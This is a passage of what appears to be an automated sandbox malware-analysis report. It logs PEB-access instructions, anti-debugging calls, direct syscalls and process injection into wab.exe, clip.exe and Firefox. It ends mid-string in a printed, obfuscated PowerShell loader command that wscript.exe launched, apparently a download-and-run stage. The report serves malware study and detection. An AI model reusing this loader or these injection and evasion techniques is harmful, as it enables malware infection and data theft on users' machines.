            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9F32A mov eax, dword ptr fs:[00000030h]25_2_21F9F32A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220450D9 mov eax, dword ptr fs:[00000030h]25_2_220450D9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C310 mov ecx, dword ptr fs:[00000030h]25_2_21F6C310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F90310 mov ecx, dword ptr fs:[00000030h]25_2_21F90310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F692FF mov eax, dword ptr fs:[00000030h]25_2_21F692FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22030115 mov eax, dword ptr fs:[00000030h]25_2_22030115
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov ecx, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h]25_2_21F792C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h]25_2_21F792C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045152 mov eax, dword ptr fs:[00000030h]25_2_22045152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h]25_2_21F802A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h]25_2_21F802A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h]25_2_21FA329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h]25_2_21FA329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22009179 mov eax, dword ptr fs:[00000030h]25_2_22009179
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h]25_2_2202C188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h]25_2_2202C188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h]25_2_21FB1270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h]25_2_21FB1270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F99274 mov eax, dword ptr fs:[00000030h]25_2_21F99274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6826B mov eax, dword ptr fs:[00000030h]25_2_21F6826B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A250 mov eax, dword ptr fs:[00000030h]25_2_21F6A250
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F76259 mov eax, dword ptr fs:[00000030h]25_2_21F76259
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h]25_2_21F69240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h]25_2_21F69240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA724D mov eax, dword ptr fs:[00000030h]25_2_21FA724D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h]25_2_220361C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h]25_2_220361C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6823B mov eax, dword ptr fs:[00000030h]25_2_21F6823B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220451CB mov eax, dword ptr fs:[00000030h]25_2_220451CB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220461E5 mov eax, dword ptr fs:[00000030h]25_2_220461E5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h]25_2_21FA7208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h]25_2_21FA7208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h]25_2_21FAC5ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h]25_2_21FAC5ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F725E0 mov eax, dword ptr fs:[00000030h]25_2_21F725E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F995DA mov eax, dword ptr fs:[00000030h]25_2_21F995DA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F765D0 mov eax, dword ptr fs:[00000030h]25_2_21F765D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h]25_2_21FAA5D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h]25_2_21FAA5D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045636 mov eax, dword ptr fs:[00000030h]25_2_22045636
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h]25_2_21FAE5CF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h]25_2_21FAE5CF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA55C0 mov eax, dword ptr fs:[00000030h]25_2_21FA55C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h]25_2_21F945B1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h]25_2_21F945B1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE59C mov eax, dword ptr fs:[00000030h]25_2_21FAE59C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA4588 mov eax, dword ptr fs:[00000030h]25_2_21FA4588
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72582 mov eax, dword ptr fs:[00000030h]25_2_21F72582
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72582 mov ecx, dword ptr fs:[00000030h]25_2_21F72582
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h]25_2_21FAB570
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h]25_2_21FAB570
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B562 mov eax, dword ptr fs:[00000030h]25_2_21F6B562
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h]25_2_21F78550
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h]25_2_21F78550
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F6C7 mov eax, dword ptr fs:[00000030h]25_2_2202F6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E724E GetProcessHeap,8_2_222E724E
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E2639
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_222E2B1C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E60E2

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Thread register set: target process: 6292
            Source: C:\Windows\SysWOW64\clip.exe Thread APC queued: target process: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 295FC44
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E50000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E3F83C
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu 